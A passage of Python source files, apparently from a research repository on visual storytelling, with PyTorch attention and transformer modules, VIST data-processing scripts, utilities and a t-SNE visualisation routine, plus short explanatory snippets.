super(FeatureEncoder, self).__init__()
self.linear = nn.Linear(video_dim, dim)
self.attention = Attention(dim)
def forward(self, feature, h):
# BLC
if isinstance(h, tuple): # check LSTM/GRU
h = h[0]
feature = self.linear(feature)
h = h.mean(dim=1)
return self.attention(h, feature).unsqueeze(1)
class PrevEncoder(nn.Module):
def __init__(self, in_dim, out_dim):
super(PrevEncoder, self).__init__()
self.linear = nn.Linear(in_dim, out_dim)
def forward(self, h):
# BLC
if isinstance(h, tuple): # check LSTM/GRU
h = h[0]
return self.linear(h)
```
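The `Attention` module above implements additive (Bahdanau-style) attention: the decoder hidden state is concatenated with every encoder position, scored by a two-layer MLP, and softmax-weighted into a context vector. A standalone restatement of that computation with random tensors, just to make the shapes concrete (the dimensions are arbitrary):
```python
import torch
import torch.nn.functional as F
from torch import nn

dim, batch_size, seq_len = 16, 4, 7
linear1 = nn.Linear(dim * 2, dim)
linear2 = nn.Linear(dim, 1, bias=False)

hidden_state = torch.randn(batch_size, dim)           # decoder state
encoder_outputs = torch.randn(batch_size, seq_len, dim)

h = hidden_state.unsqueeze(1).repeat(1, seq_len, 1)   # B x L x C
scores = linear2(torch.tanh(linear1(torch.cat((encoder_outputs, h), dim=2))))
alpha = F.softmax(scores.squeeze(-1), dim=1)          # B x L attention weights
context = torch.bmm(alpha.unsqueeze(1), encoder_outputs).squeeze(1)  # B x C
print(alpha.shape, context.shape)  # torch.Size([4, 7]) torch.Size([4, 16])
```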
#### File: code/model/modules.py
```python
import math
import torch
from torch import nn
import torch.nn.functional as F
from einops import rearrange
class IdentityModule(nn.Module):
def __init__(self):
super(IdentityModule, self).__init__()
def forward(self, x, *args, **kwargs):
return x
class BinaryLayer(torch.autograd.Function):
def forward(self, net_input):
return (net_input > 0).float().to(net_input.device)
def backward(self, grad_output):
return grad_output.clamp(0, 1)
class CutInfLayer(torch.autograd.Function):
def forward(self, net_input):
return net_input
def backward(self, grad_output):
grad_output[grad_output == float('inf')] = 0
return grad_output
def saturating_sigmoid(x):
return (1.2 * torch.sigmoid(x) - 0.1).clamp(0, 1)
def l_n_norm(x, dim=0, n=1, normalize=True):
if n > 0:
f = CutInfLayer()
x = f(x)
x = (x ** n).sum(dim=dim)
if normalize:
x = x ** (1 / n)
return x
elif n == 0:
f = BinaryLayer()
x = f(x)
return x.sum(dim=dim)
class LSTMDecoder(nn.Module):
def __init__(self, embedding):
super(LSTMDecoder, self).__init__()
self.num_layers = 2
self.wte = embedding
self.dim = embedding.weight.shape[1]
self.decoder = nn.GRU(self.dim, self.dim, self.num_layers,
bidirectional=False,
batch_first=True)
def out(self, x):
return torch.matmul(x, self.wte.weight.t())
def forward(self, h, targets, embedded=False):
# BC -> NBC
h = h.unsqueeze(0).expand(self.num_layers, -1, -1).contiguous()
# BL -> BLC
if not embedded:
targets = self.wte(targets)
logits, _ = self.decode(targets, h)
return logits
def decode(self, s, h):
o, h = self.decoder(s, h)
o = self.out(o)
return o, h
class GRU(nn.Module):
'''
batch_first GRU
'''
def __init__(self, num_layers, in_dim, out_dim, dropout=0.1, bidirectional=False):
super(GRU, self).__init__()
self.num_layers = num_layers
self.in_dim = in_dim
self.out_dim = out_dim
self.decoder = nn.GRU(self.in_dim, self.out_dim, self.num_layers,
dropout=dropout,
bidirectional=bidirectional,
batch_first=True)
def init_c(self, B, C, device=0):
return torch.zeros(B, self.num_layers, C).float().to(device)
def init_h(self, B, device=0):
if isinstance(self.decoder, nn.LSTM):
h = (torch.zeros(B, self.num_layers, self.out_dim).float().to(device),
torch.zeros(B, self.num_layers, self.out_dim).float().to(device))
else:
h = torch.zeros(B, self.num_layers, self.out_dim).float().to(device)
return h
@staticmethod
def transpose(h):
if isinstance(h, tuple):
h = [i.transpose(0, 1) for i in h]
else:
h = h.transpose(0, 1)
return h
def forward(self, s, h, **kwargs):
h = self.transpose(h)
o, h = self.decoder(s, h)
h = self.transpose(h) # BLC, BNC
return o, h
class Attention(nn.Module):
"""
Applies an attention mechanism on the output features from the decoder.
"""
def __init__(self, dim):
super(Attention, self).__init__()
self.dim = dim
self.linear1 = nn.Linear(dim * 2, dim)
self.linear2 = nn.Linear(dim, 1, bias=False)
def forward(self, hidden_state, encoder_outputs):
"""
Arguments:
hidden_state {Variable} -- batch_size x dim
encoder_outputs {Variable} -- batch_size x seq_len x dim
Returns:
Variable -- context vector of size batch_size x dim
"""
batch_size, seq_len, _ = encoder_outputs.size()
hidden_state = hidden_state.unsqueeze(1).repeat(1, seq_len, 1)
inputs = torch.cat((encoder_outputs, hidden_state),
2).view(-1, self.dim * 2)
o = self.linear2(torch.tanh(self.linear1(inputs)))
e = o.view(batch_size, seq_len)
alpha = F.softmax(e, dim=1)
context = torch.bmm(alpha.unsqueeze(1), encoder_outputs).squeeze(1)
return context
class ResBlock(nn.Module):
def __init__(self, dim, dropout=0):
super(ResBlock, self).__init__()
self.dim = dim
self.dropout = nn.Dropout(dropout)
self.linear1 = nn.Linear(self.dim, self.dim)
self.linear2 = nn.Linear(self.dim, self.dim)
self.layer_norm1 = nn.LayerNorm(self.dim)
self.layer_norm2 = nn.LayerNorm(self.dim)
self.reset_parameters()
def reset_parameters(self):
initScale = 0.1
self.linear1.weight.data.uniform_(-initScale, initScale)
self.linear1.bias.data.zero_()
self.linear2.weight.data.uniform_(-initScale, initScale)
self.linear2.bias.data.zero_()
def forward(self, x):
x_prev = x
x = self.layer_norm1(x)
x = torch.tanh(x)
x = self.linear1(x)
x = self.layer_norm2(x)
x = F.relu(x)
x = torch.tanh(x)
x = self.dropout(x)
x = self.linear2(x)
return x_prev + x
class MLP(nn.Module):
def __init__(self, in_dim, out_dim=None):
super(MLP, self).__init__()
if out_dim is None:
out_dim = in_dim
self.dim = out_dim
self.l1 = nn.Linear(in_dim, self.dim)
self.l2 = nn.Linear(self.dim, self.dim)
def forward(self, x):
x = self.l1(x)
x = F.relu(x)
x = self.l2(x)
return x
class MultiHeadAttention(nn.Module):
def __init__(self, q_dim, k_dim=None, v_dim=None, m_dim=None, heads=1):
super().__init__()
if k_dim is None:
k_dim = q_dim
if v_dim is None:
v_dim = k_dim
if m_dim is None:
m_dim = q_dim
heads = 1 if q_dim < heads else heads
heads = 1 if k_dim < heads else heads
heads = 1 if v_dim < heads else heads
assert q_dim % heads == 0, f"q_dim: {q_dim} / n_heads: {heads} must be divisible"
assert k_dim % heads == 0, f"k_dim: {k_dim} / n_heads: {heads} must be divisible"
assert v_dim % heads == 0, f"v_dim: {v_dim} / n_heads: {heads} must be divisible"
assert m_dim % heads == 0, f"m_dim: {m_dim} / n_heads: {heads} must be divisible"
self.q = nn.Linear(q_dim // heads, m_dim // heads)
self.k = nn.Linear(k_dim // heads, m_dim // heads)
self.v = nn.Linear(v_dim // heads, m_dim // heads)
self.heads = heads
def forward(self, q, k=None, v=None, bidirectional=False):
if k is None:
k = q.clone()
if v is None:
v = k.clone()
# BLC
q = rearrange(q, 'b q (h c) -> b h q c', h=self.heads)
k = rearrange(k, 'b k (h c) -> b h k c', h=self.heads)
v = rearrange(v, 'b k (h c) -> b h k c', h=self.heads)
q = self.q(q)
k = self.k(k)
v = self.v(v)
a = torch.einsum('bhqc,bhkc->bhqk', q, k)
a = a / math.sqrt(k.shape[-1])
a_q = F.softmax(a, dim=-1) # bhqk
q_new = torch.einsum('bhqk,bhkc->bhqc', a_q, v)
q_new = rearrange(q_new, 'b h q c -> b q (h c)')
if bidirectional:
a_v = F.softmax(a, dim=-2) # bhqk
v = torch.einsum('bhqk,bhqc->bhkc', a_v, q)
v = rearrange(v, 'b h k c -> b k (h c)')
return q_new, v
else:
return q_new
class SelfAttention(MultiHeadAttention):
def __init__(self, q_dim, m_dim=None, heads=1):
super().__init__(q_dim, k_dim=q_dim, v_dim=q_dim, m_dim=m_dim, heads=heads)
def forward(self, q, bidirectional=False):
return super().forward(q, q, q, bidirectional=bidirectional)
class Pffn(nn.Module):
def __init__(self, dim, large_dim):
super().__init__()
self.in_linear = nn.Linear(dim, large_dim)
self.out_linear = nn.Linear(large_dim, dim)
def forward(self, x):
x = self.in_linear(x)
x = F.relu(x)
x = self.out_linear(x)
return x
class Residual(nn.Module):
def __init__(self, module):
super().__init__()
self.m = module
def forward(self, x):
return x + self.m(x)
class TransformerAttention(nn.Module):
def __init__(self, q_dim, m_dim=None, heads=8):
super().__init__()
self.att = SelfAttention(q_dim, m_dim=m_dim, heads=heads)
self.layer_norm = nn.LayerNorm(q_dim)
def forward(self, q):
q_new = self.att(q, bidirectional=False)
return self.layer_norm(q + q_new)
```
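A quick standalone walk-through of the attention pattern in `MultiHeadAttention.forward` above: channels are split into heads with `einops.rearrange`, attention scores come from an einsum over the channel axis, and the softmax-weighted values are merged back. The shapes below are arbitrary:
```python
import math
import torch
import torch.nn.functional as F
from einops import rearrange

B, Lq, Lk, C, heads = 2, 5, 7, 16, 4
q = rearrange(torch.randn(B, Lq, C), 'b q (h c) -> b h q c', h=heads)
k = rearrange(torch.randn(B, Lk, C), 'b k (h c) -> b h k c', h=heads)
v = rearrange(torch.randn(B, Lk, C), 'b k (h c) -> b h k c', h=heads)

a = torch.einsum('bhqc,bhkc->bhqk', q, k) / math.sqrt(k.shape[-1])
q_new = torch.einsum('bhqk,bhkc->bhqc', F.softmax(a, dim=-1), v)
q_new = rearrange(q_new, 'b h q c -> b q (h c)')
print(q_new.shape)  # torch.Size([2, 5, 16])
```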
#### File: code/model/transformer_dis.py
```python
from collections import OrderedDict
from itertools import chain
import torch
from torch import nn
import torch.nn.functional as F
from exp import ex
from run_transformer import transformer_embed, transformer_run_cells
from .hybrid_dis import HybridDis
from .keyword_classifier import KeywordClassifier
from .NetVLAD import NetVLADWrapper
class TransformerDis(HybridDis):
transformer_name = 'gpt2' # assign transformer_name = 'bert' to use BPE
@classmethod
def get_args(cls):
return {
**super().get_args(),
'dropout_before': False,
}
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before):
super(TransformerDis, self).__init__(transformer, tokenizer)
self.dropout_before = dropout_before
self.net = transformer
self.net.train()
config = self.net.transformer.config
for name in ['emb_dim', 'n_embd', 'd_model', 'hidden_size']:
if hasattr(config, name):
self.gpt_dim = getattr(config, name)
break
assert hasattr(self, 'gpt_dim'), "no dimension specified"
if not hasattr(self.net.transformer, 'word_embedding'):
if not hasattr(self.net.transformer, 'wte'):
if not hasattr(self.net.transformer, 'word_emb'):
if not hasattr(self.net.transformer, 'w'):
self.net.transformer.w = self.net.transformer.embeddings
self.net.transformer.word_emb = self.net.transformer.w
self.net.transformer.wte = self.net.transformer.word_emb
self.net.transformer.word_embedding = self.net.transformer.wte
'''
self.net.transformer.wte = self.net.transformer.word_embedding
if hasattr(self.net.transformer, 'word_embedding'):
del self.net.transformer.word_embedding
'''
'''
self.keyword_classifier = KeywordClassifier(
self.net.transformer.word_embedding,
self.keyword_num, self.dim, self.feature_names,
self.feature_dims,
self.dropout_ratio,
recall_k=self.k,
loss_type=self.keyword_loss_type
)
'''
def chain(input_, f_list):
for op in f_list:
input_ = op(input_)
return input_
for feature in self.feature_names:
if feature in ['human_i3d']:
setattr(self, feature,
nn.Sequential(*[NetVLADWrapper(feature_size=1536, cluster_size=24),
FeatureEncoder(1536 * 24, self.gpt_dim)]))
continue
setattr(self, feature, FeatureEncoder(self.feature_dims[feature], self.gpt_dim))
self.reduce_cat = nn.Linear(self.gpt_dim + self.keyword_num, self.gpt_dim)
self.reduce_c = nn.Linear(self.gpt_dim, self.dim)
self.dropout = nn.Dropout(self.dropout_ratio)
self.visual_dropout = nn.Dropout(self.visual_dropout_ratio)
def add_keyword(self, h, keyword):
h = torch.cat((h, # features.unsqueeze(1).expand(-1, h.shape[1], -1),
keyword.unsqueeze(1).expand(-1, h.shape[1], -1)), dim=-1)
h = self.reduce_cat(h)
return h
def get_logits(self, o, keyword, gt=None):
return self.net.lm_head(o), None, {}
def merge_context(self, features, cls_embd, sep_embd):
features = OrderedDict(sorted(features.items())) # canonical ordering
return torch.cat((cls_embd, *chain(*[(feature, sep_embd) for feature in features.values()])), dim=1)
def get_embedding(self, name, device):
x = torch.LongTensor([getattr(self.tokenizer, name)]).to(device)
x = x.unsqueeze(0)
x = self.net.transformer.word_embedding(x)
return x.squeeze(0)
def run_transformer(self, B, hypo, features, keyword, infer=False):
h, inputs = transformer_embed(self.net.transformer, hypo,
skip_ids=[self.tokenizer.pad_id, self.tokenizer.sep_id],
infer=infer)
h = self.add_keyword(h, keyword)
cls_embd = self.get_embedding('cls_id', h.device)
sep_embd = self.get_embedding('sep_id', h.device)
B, L, C = h.shape
cls_embd = cls_embd.view(1, 1, -1).contiguous().expand(B, 1, -1)
sep_embd = sep_embd.view(1, 1, -1).contiguous().expand(B, 1, -1)
context = self.merge_context(features, cls_embd, sep_embd)
o, context_embedded = transformer_run_cells(self.net.transformer, context, h, hypo=hypo,
pad_id=self.tokenizer.pad_id, **inputs)
o = self.dropout(o)
context_embedded = self.visual_dropout(context_embedded)
return o, context_embedded
def run_transformer_get_loss(self, hypo, features, keyword, group_mask=None, gt=None):
features = OrderedDict(sorted(features.items())) # canonical ordering
res = OrderedDict()
for feature in self.feature_names:
res[feature] = getattr(self, feature)(features[feature])
o, _ = self.run_transformer(hypo.shape[0], hypo, res, keyword)
c = o.mean(dim=1)
c = self.reduce_c(c)
logits, loss, stats = self.get_logits(o, keyword, gt)
return logits, c, loss, stats
def run_token(self, features, hypo, h, c, group_mask, keyword):
logits, h = self.generate_token(hypo, features, c, h, group_mask, keyword)
return h, c, logits
def run_train(self, hypo, features, keyword, group_mask=None):
return self.run_transformer_get_loss(hypo, features, keyword, group_mask, gt=hypo)
def generate_token(self, hypo, features, c, h, group_mask, keyword):
logits, h, _, _ = self.run_transformer_get_loss(hypo, features, keyword, group_mask)
return logits, h
def run_video(self, features, c, v, L, sentences=None, sampler=None,
keyword=None, reduce_hypo=True, group_mask=None):
video = features['video']
B = video.shape[0]
empty = torch.full((B, self.vocab_size), float('-inf')).to(video.device)
sent = []
eos_flags = torch.LongTensor([0] * B).bool().to(video.device)
if c is None:
c = self.rnn.init_c(B, self.context_dim, device=video.device) if hasattr(self, 'rnn') else None
s0 = sentences[:, v, 0] if sentences is not None \
else torch.Tensor([self.tokenizer.cls_id]).long().to(video.device).expand(B)
s = s0
hypo = s0.unsqueeze(-1)
stats = {}
small_loss = None
if sentences is not None: # training
sent, h, small_loss, stats = self.run_train(sentences[:, v], features, keyword, group_mask)
else:
for w in range(L):
if eos_flags.all():
logits = empty.clone()
else:
h = None
h, c, logits = self.run_token(features, hypo, h, c, group_mask, keyword=keyword)
s, probs = sampler(logits, alpha=self.normalizer_alpha)
eos_flags = eos_flags | (logits[:, -1].argmax(dim=-1) == self.tokenizer.pad_id)
hypo = torch.cat((hypo, s.unsqueeze(-1)), dim=1)
sent.append(logits)
hypo = hypo[:, 1:]
if reduce_hypo:
hypo = hypo[probs.argmax(dim=-1)]
c = self.context_encoder(h)
if not self.use_context:
c = torch.full_like(c.detach(), 0)
c.requires_grad_(False)
return c, sent, hypo, small_loss, stats
class FeatureEncoder(nn.Module):
def __init__(self, video_dim, dim):
super(FeatureEncoder, self).__init__()
self.linear = nn.Linear(video_dim, dim)
def forward(self, feature, h=None):
# BLC
feature = self.linear(feature)
feature = F.leaky_relu(feature)
return feature
```
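`TransformerDis.__init__` probes the wrapped transformer's config for whichever hidden-size attribute the particular architecture exposes (`emb_dim`, `n_embd`, `d_model`, or `hidden_size`). A tiny sketch of that fallback with a stand-in config object (the `DummyConfig` here is made up):
```python
class DummyConfig:
    n_embd = 768  # e.g. what a GPT-2 style config exposes

def probe_hidden_size(config):
    for name in ['emb_dim', 'n_embd', 'd_model', 'hidden_size']:
        if hasattr(config, name):
            return getattr(config, name)
    raise AttributeError('no dimension attribute found on config')

print(probe_hidden_size(DummyConfig()))  # 768
```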
#### File: code/scripts/make_story.py
```python
import json
from pathlib import Path
from collections import defaultdict, OrderedDict
#from exp import ex
def leave_unique(dt):
for k, v in dt.items():
dt[k] = list(set(v))
return dt
def save_file(obj, path, name):
obj_path = path.parent / f"post_{path.stem}_{name}{path.suffix}"
print(f"saving to {obj_path}")
with open(obj_path, 'w') as f:
json.dump(obj, f, indent=4)
# @ex.capture()
def main(filename):
root = Path('~/projects/lsmdc/data/VIST/sis').expanduser()
path = root / filename
with open(path, 'r') as f:
data = json.load(f)
data = data['annotations']
stories = defaultdict(list)
for d in data:
d = d[0]
stories[d['story_id']].append(
{'album_id': d['album_id'],
'photo_flickr_id': d['photo_flickr_id'],
'worker_arranged_photo_order': d['worker_arranged_photo_order'],
'text': d['text']})
albums = defaultdict(list)
images = defaultdict(list)
for k, v in stories.items():
v = OrderedDict([(i['worker_arranged_photo_order'], i) for i in v])
v = sorted(v.items())
v = [i for k, i in v]
texts = ' '.join([i['text'] for i in v])
stories[k] = [texts]
aid = v[0]['album_id']
albums[aid].append(texts)
iid = f"{aid}_{[i['photo_flickr_id'] for i in v]}"
images[iid].append(texts)
stories = leave_unique(stories)
albums = leave_unique(albums)
images = leave_unique(images)
save_file(stories, path, 'stories')
save_file(albums, path, 'albums')
save_file(images, path, 'images')
if __name__ == "__main__":
main('test.story-in-sequence.json')
```
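The script above groups VIST "story-in-sequence" annotations by `story_id` and joins the texts in `worker_arranged_photo_order`. A self-contained sketch of that grouping on a couple of made-up annotation records (only the keys follow the format used above; the values are invented):
```python
from collections import defaultdict, OrderedDict

annotations = [
    [{'story_id': 's1', 'album_id': 'a1', 'photo_flickr_id': 'p2',
      'worker_arranged_photo_order': 1, 'text': 'then we went home.'}],
    [{'story_id': 's1', 'album_id': 'a1', 'photo_flickr_id': 'p1',
      'worker_arranged_photo_order': 0, 'text': 'we went to the park.'}],
]

stories = defaultdict(list)
for d in annotations:
    d = d[0]
    stories[d['story_id']].append(d)

for story_id, items in stories.items():
    ordered = OrderedDict((i['worker_arranged_photo_order'], i) for i in items)
    text = ' '.join(i['text'] for _, i in sorted(ordered.items()))
    print(story_id, '->', text)  # s1 -> we went to the park. then we went home.
```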
#### File: tapm/code/tensor_utils.py
```python
import torch
'''
def onehot(x, max_size):
hot = torch.FloatTensor(*x.shape, max_size).to(x.device)
x = x.unsqueeze(-1)
hot.zero_()
hot.scatter_(-1, x, 1)
return hot.detach()
'''
def find_first(t, value=0):
# t: 1d tensor
mask = t == value
mask = mask.nonzero()
val = mask.sort()[0]
if val.nelement() > 0:
return val[0].item()
else:
return t.shape[0]
def unsqueeze_expand(src, tgt):
if len(src.shape) != len(tgt.shape):
src = src.view(*src.shape, *[1 for i in range(
len(tgt.shape) - len(src.shape))])
if src.shape != tgt.shape:
src = src.expand_as(tgt)
return src
def move_device(batch, to=-1):
for key, tensor in batch.items():
if torch.is_tensor(tensor):
batch[key] = tensor.to(to)
elif tensor is None:
batch[key] = None
elif isinstance(tensor, dict):
batch[key] = tensor
elif isinstance(tensor, list):
li = []
for t in tensor:
if torch.is_tensor(t):
li.append(t.to(to))
else:
li.append(t)
batch[key] = li
return batch
def remove_cls_sep(x, tokenizer):
targets = x[:, 1:] # remove cls
dec_input = x.clone().detach()
dec_input.masked_scatter_(x == tokenizer.sep_id,
torch.full_like(dec_input, tokenizer.pad_id))
dec_input = dec_input[:, :-1] # remove sep
return dec_input, targets
def onehot(x, total=1000):
storage = torch.zeros(*x.shape, total).bool().to(x.device)
storage.scatter_(dim=-1, index=x.unsqueeze(-1), value=1)
return storage
```
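`remove_cls_sep` above builds decoder inputs and targets by dropping the leading CLS from the targets and blanking the SEP position in the inputs. A toy demonstration of the same transformation (equivalent boolean indexing is used instead of `masked_scatter_` for brevity; the token ids and the `tok` namespace are invented for the example):
```python
import torch
from types import SimpleNamespace

# Invented ids: 0 = PAD, 1 = CLS, 2 = SEP, 3+ = words.
tok = SimpleNamespace(pad_id=0, cls_id=1, sep_id=2)

x = torch.tensor([[1, 5, 6, 2, 0]])       # [CLS] w w [SEP] [PAD]

targets = x[:, 1:]                        # drop CLS
dec_input = x.clone()
dec_input[x == tok.sep_id] = tok.pad_id   # blank out SEP
dec_input = dec_input[:, :-1]             # drop last position

print(dec_input.tolist())  # [[1, 5, 6, 0]]
print(targets.tolist())    # [[5, 6, 2, 0]]
```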
#### File: tapm/code/utils.py
```python
from contextlib import contextmanager
import sys, os
import random
from collections import defaultdict
from datetime import datetime
from copy import copy as pycopy
import six
# import stanfordnlp
import numpy as np
import torch
from torch.nn.utils import clip_grad_norm_
def remove_nonascii(text):
# return ''.join([i if ord(i) < 128 else ' ' for i in text])
return text.encode('ascii', 'ignore').decode('ascii')
def flatten_dict(x):
if isinstance(x, dict):
li = [flatten_dict(v) for v in x.values()]
return flatten_list(li)
elif isinstance(x, list):
return x
else:
return [x]
def flatten_list(x):
return [it for subli in x for it in subli]
def recurse(shape, *args, vid='0', func=None):
if len(shape) > 0:
for i in range(shape[0]):
if not isinstance(vid, str):
if len(vid) > i:
vid_new = vid[i]
recurse(shape[1:], *list([v[i] if v is not None else v for v in args]),
vid=vid_new, func=func)
else:
vid_new = f'{vid}_{i}'
recurse(shape[1:], *list([v[i] if v is not None else v for v in args]),
vid=vid_new, func=func)
else:
func(*args, vid=vid)
def jsonl_to_json(x):
def get_key(t):
if isinstance(t, dict):
return t.keys()
else:
return get_key(t[0])
keys = get_key(x)
def merge_key(t, key):
if isinstance(t[0], dict):
return [i[key] for i in t if key in i]
else:
return [[k for k in merge_key(i, key)] for i in t]
res = {}
for key in keys:
res[key] = merge_key(x, key)
return res
def mean(x):
x = list(x)
x = [i for i in x if i is not None]
if len(x) == 0:
return None
return sum(x) / len(x)
def cut_sample(data, n=800):
if isinstance(data, list):
return data[:n]
elif isinstance(data, dict):
return {k: v for i, (k, v) in enumerate(data.items())
if i < n}
else:
assert False, f'cutting not implemented for type {type(data)}'
def get_now():
now = datetime.now()
return now.strftime('%Y-%m-%d-%H-%M-%S')
def add_attr(dt, name, val):
for key, value in dt.items():
setattr(value, name, val)
dt[key] = value
return dt
def transpose_dict(dt):
d = defaultdict(dict)
for key1, inner in dt.items():
for key2, value in inner.items():
d[key2][key1] = value
return d
def peek_dict(dt):
return next(iter(dt.items()))
def freeze(module):
for param in module.parameters():
param.requires_grad = False
def check_equal(li):
if isinstance(li[0], list):
li = [list(i) for i in zip(*li)]
return min([int(len(set(l)) <= 1) for l in li]) > 0
else:
return len(set(li)) <= 1
def clip_grad(model, max_norm=1):
if max_norm is not None:
for p in model.parameters():
clip_grad_norm_(p, max_norm)
def wait_for_key(key="y"):
text = ""
while (text != key):
text = six.moves.input(f"Press {key} to quit")
if text == key:
print("terminating process")
else:
print(f"key {key} unrecognizable")
def remove_duplicate(li, key=lambda x: x):
keys = set([key(i) for i in li])
keys = {k: False for k in keys}
res = []
for i in li:
i_key = key(i)
if not keys[i_key]:
keys[i_key] = True
res.append(i)
return res
def remove_sep(string, sep='[SEP]'):
return string[:string.find(sep)].strip()
def copy(x):
if isinstance(x, list):
res = []
for i in range(len(x)):
res.append(copy(x[i]))
elif isinstance(x, dict):
res = {}
for k in x.keys():
res[k] = copy(x[k])
else:
res = x
return res
def recursive_insert_dict(dt, key_list, val):
key = key_list[0]
if len(key_list) == 1:
dt[key] = val
return dt
if key not in dt:
dt[key] = {}
udt_dt = recursive_insert_dict(dt[key], key_list[1:], val)
dt[key] = udt_dt
return dt
def concatenate_group(text, groups):
res = {}
for group_key, vids in groups.items():
t = [text[vid] for vid in vids]
hypo, tgt = zip(*t)
hypo = ' '.join(list(hypo))
tgt = ' '.join(list(tgt))
res[group_key] = (hypo, tgt)
return res
def break_tie(li, longest=False):
if longest:
res = ''
for l in li:
if len(l) >= len(res):
res = l
else:
len_res = 9999
for l in li:
if len(l) < len_res:
res = l
len_res = len(res)
return res
def refactor_text(text, albums=None, images=None,
return_list=False, longest=False):
if albums is None:
return text
else:
reverse_albums = {vi: k for k, v in albums.items() for vi in v}
text = [{'album_id': reverse_albums[k],
'photo_sequence': images[k],
'story_text_normalized': v.lower()} for k, v in text.items()]
text = [(f"{v['album_id']}_{v['photo_sequence']}", v) for v in text] # remove duplicate
keys = [i[0] for i in text]
keys = list(set(keys))
res = []
for key in keys:
t = [v for k, v in text if k == key]
if not return_list:
t = break_tie(t, longest=longest)
else:
t = {**t[0],
'story_text_normalized': [i['story_text_normalized'] for i in t]}
res.append(t)
return {
'team_name': "temp_team_name",
"evaluation_info": {
"additional_description": "none"
},
"output_stories": res}
def merge_vist_output(hypo, tgt, album=False):
hypo = hypo['output_stories']
tgt = tgt['output_stories']
if album:
res = defaultdict(list)
for v in hypo:
res[v['album_id']].append(v['story_text_normalized'])
hypo = {}
# tie breaking
for k, v in res.items():
hypo[k] = break_tie(v)
else:
hypo = {f"{v['album_id']}_{v['photo_sequence']}": v['story_text_normalized'] for v in hypo}
res = defaultdict(list)
for v in tgt:
if album:
res[v['album_id']].append(v['story_text_normalized'])
else:
res[f"{v['album_id']}_{v['photo_sequence']}"].append(v['story_text_normalized'])
tgt = {k: flatten(v) for k, v in res.items()}
'''
if normalize:
normalizer = VistTokenizer()
hypo = {k: normalizer(v) for k, v in hypo.items()}
tgt = {k: [normalizer(i) for i in v] for k, v in tgt.items()}
'''
return {k: (hypo[k], tgt[k]) for k in tgt.keys()}
'''
def normalize_text(t):
t = t.replace('.', ' .')
t = t.replace(',', ' ,')
t = t.replace('?', ' ?')
t = t.replace('!', ' !')
t = t.replace("'s", " 's")
t = t.replace("n't", " n't")
return t
'''
'''
class VistTokenizer:
def __init__(self):
self.nlp = stanfordnlp.Pipeline(processors='tokenize', lang='en')
def _tokenize(self, x):
doc = self.nlp(x)
res = []
for sent in doc.sentences:
res += [token.words[0].text for token in sent.tokens]
res = ' '.join(res)
return res
def tokenize(self, x):
with suppress_stdout():
return self._tokenize(x)
def __call__(self, x):
return self.tokenize(x)
'''
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def flatten(li):
return [item for sublist in li for item in sublist]
@contextmanager
def suppress_stdout(do=True):
if do:
with open(os.devnull, "w") as devnull:
old_stdout = sys.stdout
sys.stdout = devnull
try:
yield
finally:
sys.stdout = old_stdout
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
```
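`jsonl_to_json` above transposes a list of per-item dicts into a dict of lists, and `mean` skips `None` entries; this is how per-video stats are aggregated in `HybridDis.forward`. A short usage sketch, assuming the file above is importable as `utils`:
```python
from utils import jsonl_to_json, mean  # assumes utils.py above is on the path

vid_stats = [
    {'sentence_len': 9.0, 'keyword_recall': 0.5},
    {'sentence_len': 11.0, 'keyword_recall': None},
]

merged = jsonl_to_json(vid_stats)
# {'sentence_len': [9.0, 11.0], 'keyword_recall': [0.5, None]}
averaged = {k: mean(v) for k, v in merged.items()}
print(averaged)  # {'sentence_len': 10.0, 'keyword_recall': 0.5}
```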
#### File: tapm/code/vis_tsne.py
```python
from collections import defaultdict
from pathlib import Path
import pickle
from tqdm import tqdm
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
from sklearn.metrics import silhouette_score
import torch
from einops import rearrange
# from tsnecuda import TSNE
from exp import ex
from tensor_utils import move_device
from run_transformer import transformer_embed
@ex.capture
def _tsne(model, loss_fn, optimizer, tokenizer, dataloaders, logger,
metrics, batch_sizes, device, reg_coeff, eval_metric, model_name,
root,
epoch=-1, subset=None, key=None, eval_generate=True,
eval_set=False, sample=False, concat_group=False,
use_vist=False):
if key is None:
key = 'val'
epoch_stats = defaultdict(float)
model.eval()
dataloader = dataloaders[key]
if subset is not None:
subset = (len(dataloader) * subset) // batch_sizes[key]
subset = max(1, subset)
total_length = subset
path = root / 'data' / 'vis'
path.mkdir(exist_ok=True)
tsne = []
tsne_group = []
tsne_large = []
print("starting extraction")
with torch.no_grad():
for batch in tqdm(dataloader, total=subset):
batch = move_device(batch,
to=device)
vid, text = extract_reps(model, batch)
res, group, large_pool = get_tsne(vid, text, max_samples=None)
tsne = [*tsne, *res]
tsne_group = [*tsne_group, *group]
tsne_large.append(large_pool)
with open(path / f"{model_name}_single.pkl", 'wb') as f:
pickle.dump(tsne, f)
with open(path / f"{model_name}_group.pkl", 'wb') as f:
pickle.dump(tsne_group, f)
with open(path / f"{model_name}_large.pkl", 'wb') as f:
pickle.dump(tsne_large, f)
print("extraction done!")
def extract_reps(model, batch):
features, features_merged, keywords, G = model.prepare_group(batch)
hypo = batch.sentences
hypo = rearrange(hypo.contiguous(), 'b g l -> (b g) l')
h, inputs = transformer_embed(model.net.transformer, hypo,
skip_ids=[model.tokenizer.pad_id, model.tokenizer.sep_id],
infer=False)
return features_merged, h
def get_tsne(vid, text, max_samples=None):
# (b g) l c
vid = torch.cat(list(vid.values()), dim=1)
vid_length = vid.shape[1]
data = torch.cat((vid, text), dim=1)
pca = PCA(n_components=10)
tsne = TSNE(n_components=2, verbose=1, perplexity=40, n_iter=300)
res = []
group_pool = []
large_pools = []
if max_samples is None:
max_samples = data.shape[0] // 5
# assert max_samples <= data.shape[0], 'max_sample too large'
max_samples = min(max_samples, data.shape[0] // 5)
for i in tqdm(range(max_samples)):
group = []
'''
for j in tqdm(range(5)):
sample = data[i * 5 + j]
sample = sample.cpu()
sample = sample.numpy()
sample = pca.fit_transform(sample)
sample = tsne.fit_transform(sample)
# tsne = TSNE(n_components=2, perplexity=15, learning_rate=10).fit_transform(sample)
group.append((sample[:vid_length], sample[vid_length:]))
res.append(group)
'''
group_data = data[i * 5: i * 5 + 5]
g_vid = group_data[:, :vid_length].mean(dim=1) # 5C
g_text = group_data[:, vid_length:].mean(dim=1)
g_data = torch.cat((g_vid, g_text), dim=0).cpu().numpy()
g_data = pca.fit_transform(g_data)
g_data = tsne.fit_transform(g_data)
length = g_vid.shape[0]
